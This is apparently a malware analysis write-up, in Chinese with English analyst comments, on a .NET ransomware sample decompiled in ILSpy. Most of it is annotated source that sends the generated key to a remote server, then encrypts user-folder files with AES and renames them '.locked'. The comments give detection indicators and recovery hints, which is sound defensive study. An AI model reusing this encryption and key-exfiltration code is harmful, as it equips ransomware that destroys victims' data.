样本文件类型及其基本信息搜集
使用 DIE(Detect It Easy)分析

静态分析
ILSpy分析
ILSpy 对 .NET 程序的反编译支持很好。
将样本拖入 ILSpy 打开,可以找到入口函数。

接下来看这个Form1类
创建密码
/// <summary>
/// Analyst note (decompiled sample code): builds the password that is later hashed into the
/// file-encryption key. Returns a string of <paramref name="length"/> characters drawn from a
/// fixed 68-character alphabet (a-z, A-Z, 0-9 and six symbols).
/// </summary>
/// <param name="length">Number of characters to generate; zero or a negative value yields an empty string.</param>
/// <returns>The generated password string.</returns>
public string CreatePassword(int length)
{
StringBuilder stringBuilder = new StringBuilder();
// System.Random is a non-cryptographic PRNG, and the parameterless constructor picks its own seed.
// NOTE(review): if the sample targets .NET Framework (runtime not shown in this listing), that seed
// is derived from the system tick count, so the password space is far smaller than the alphabet
// suggests. That is relevant to key-recovery attempts during incident response - confirm the runtime.
Random random = new Random();
// Post-decrement loop: runs exactly `length` times for positive values.
while (0 < length--)
{
// Picks one character per iteration by indexing the alphabet literal with random.Next(alphabet length).
stringBuilder.Append("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=?()"[random.Next("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=?()".Length)]);
}
return stringBuilder.ToString();
}
发送密码
/// <summary>
/// Analyst note (decompiled sample code): reports the host name, user name and generated password
/// to the operator's server with a single HTTP GET request.
/// </summary>
/// <param name="password">The password string to transmit.</param>
public void SendPassword(string password)
{
try
{
// Query string carries four parameters: computer_name, userName, password and the constant allow=ransom.
// computerName and userName are fields defined outside this listing.
// Detection: this parameter set in a GET request is a usable network indicator. The password is placed
// in the URL as built here, so proxy or gateway logs that record full URLs may contain it.
string text = "?computer_name=" + computerName + "&userName=" + userName + "&password=" + password + "&allow=ransom";
// targetURL is a field defined outside this listing; scheme and host cannot be determined from here.
string address = targetURL + text;
// WebClient.DownloadString issues the GET; the response body is stored but never read afterwards.
string text2 = new WebClient().DownloadString(address);
}
catch (Exception)
{
// All exceptions are swallowed, so a failed request is silent and this method gives the caller no
// failure signal. NOTE(review): whether the caller continues to encrypt regardless is not visible
// here - confirm in the calling code.
}
}
扫描目录并加密
/// <summary>
/// Analyst note (decompiled sample code): builds a fixed list of per-user profile folders and passes
/// each one to encryptDirectory. The folder list defines the scope of impact for triage.
/// </summary>
/// <param name="password">Password forwarded unchanged to encryptDirectory.</param>
public void Directory_Settings_Sending(string password)
{
// Every target is userDir + "Users\" + userName + a folder name; userDir and userName are fields
// defined outside this listing.
string text = "Users\\";
string location = userDir + text + userName + "\\Desktop";
string location2 = userDir + text + userName + "\\Links";
string location3 = userDir + text + userName + "\\Contacts";
// Desktop appears a second time here (same path as `location`), so it is traversed twice.
string location4 = userDir + text + userName + "\\Desktop";
string location5 = userDir + text + userName + "\\Documents";
string location6 = userDir + text + userName + "\\Downloads";
string location7 = userDir + text + userName + "\\Pictures";
string location8 = userDir + text + userName + "\\Music";
string location9 = userDir + text + userName + "\\OneDrive";
string location10 = userDir + text + userName + "\\Saved Games";
string location11 = userDir + text + userName + "\\Favorites";
string location12 = userDir + text + userName + "\\Searches";
string location13 = userDir + text + userName + "\\Videos";
// Folders are processed sequentially in the order declared above. Only these thirteen paths
// (and their subfolders, via the recursion in encryptDirectory) are touched by this method.
encryptDirectory(location, password);
encryptDirectory(location2, password);
encryptDirectory(location3, password);
encryptDirectory(location4, password);
encryptDirectory(location5, password);
encryptDirectory(location6, password);
encryptDirectory(location7, password);
encryptDirectory(location8, password);
encryptDirectory(location9, password);
encryptDirectory(location10, password);
encryptDirectory(location11, password);
encryptDirectory(location12, password);
encryptDirectory(location13, password);
}
/// <summary>
/// Analyst note (decompiled sample code): walks one directory, passes every file whose extension is
/// on a hard-coded list to EncryptFile, then recurses into each subdirectory.
/// </summary>
/// <param name="location">Directory to process.</param>
/// <param name="password">Password forwarded unchanged to EncryptFile and to the recursive calls.</param>
public void encryptDirectory(string location, string password)
{
try
{
// Hard-coded list of targeted extensions (68 slots; ".mp3" is listed twice).
// ".locked" is not on the list, so files already renamed by EncryptFile are skipped on a later pass.
string[] source = new string[68]
{
".txt", ".jar", ".exe", ".dat", ".contact", ".settings", ".doc", ".docx", ".xls", ".xlsx",
".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".py", ".sql", ".mdb", ".sln",
".php", ".asp", ".aspx", ".html", ".htm", ".xml", ".psd", ".pdf", ".dll", ".c",
".cs", ".mp3", ".mp4", ".f3d", ".dwg", ".cpp", ".zip", ".rar", ".mov", ".rtf",
".bmp", ".mkv", ".avi", ".apk", ".lnk", ".iso", ".7-zip", ".ace", ".arj", ".bz2",
".cab", ".gzip", ".lzh", ".tar", ".uue", ".xz", ".z", ".001", ".mpeg", ".mp3",
".mpg", ".core", ".crproj", ".pdb", ".ico", ".pas", ".db", ".torrent"
};
string[] files = Directory.GetFiles(location);
string[] directories = Directory.GetDirectories(location);
for (int i = 0; i < files.Length; i++)
{
string extension = Path.GetExtension(files[i]);
// Contains() on a string[] compares with default string equality, i.e. exact and case-sensitive.
// Triage: files whose extension differs in case from the list entries are not selected here.
if (source.Contains(extension))
{
EncryptFile(files[i], password);
}
}
// Depth-first recursion into every subdirectory; no depth limit or exclusion list is visible here.
for (int j = 0; j < directories.Length; j++)
{
encryptDirectory(directories[j], password);
}
}
catch (Exception)
{
// Exception handling logic goes here
// Analyst note: the handler is empty. Any exception raised above (by the directory listing calls or
// propagating out of EncryptFile) silently ends processing of this directory, so files later in the
// listing and its subdirectories may be left untouched. Expect partially affected folders in triage.
}
}
/// <summary>
/// Analyst note (decompiled sample code): encrypts one file in place with a key derived from the
/// password, then renames it by appending ".locked".
/// </summary>
/// <param name="file">Path of the file to process.</param>
/// <param name="password">Password string; its SHA-256 digest is handed to AES_Encrypt.</param>
public void EncryptFile(string file, string password)
{
// Read the whole file into memory.
byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
// Convert the password to UTF-8 bytes.
byte[] bytes = Encoding.UTF8.GetBytes(password);
// Replace those bytes with their SHA-256 digest. One unsalted hash pass is the only derivation
// visible in this method; the same password therefore gives the same 32 bytes for every file.
bytes = SHA256.Create().ComputeHash(bytes);
// Encrypt the file content. AES_Encrypt is defined outside this listing.
// NOTE(review): cipher mode, IV and any further key derivation cannot be determined from here -
// inspect AES_Encrypt before drawing conclusions about recoverability.
byte[] bytes2 = AES_Encrypt(bytesToBeEncrypted, bytes);
// Build the fixed path userDir + "Users\" + userName + "\Desktop\READ_IT.txt.locked"
// (userDir and userName are fields defined outside this listing).
string text = "Users\\";
string text2 = text + userName + "\\Desktop\\READ_IT.txt.locked";
string path = userDir + text2;
// If that path already exists, delete it.
// NOTE(review): presumably this removes a ransom note that was itself encrypted and renamed - confirm.
if (File.Exists(path))
{
File.Delete(path);
}
// Write the encrypted content back over the original file (in-place overwrite, no separate copy).
File.WriteAllBytes(file, bytes2);
// Rename the file by appending ".locked".
// Detection: a burst of file overwrites each followed by a rename to "*.locked" under the user
// profile is a behavioural indicator for this sample.
File.Move(file, file + ".locked");
}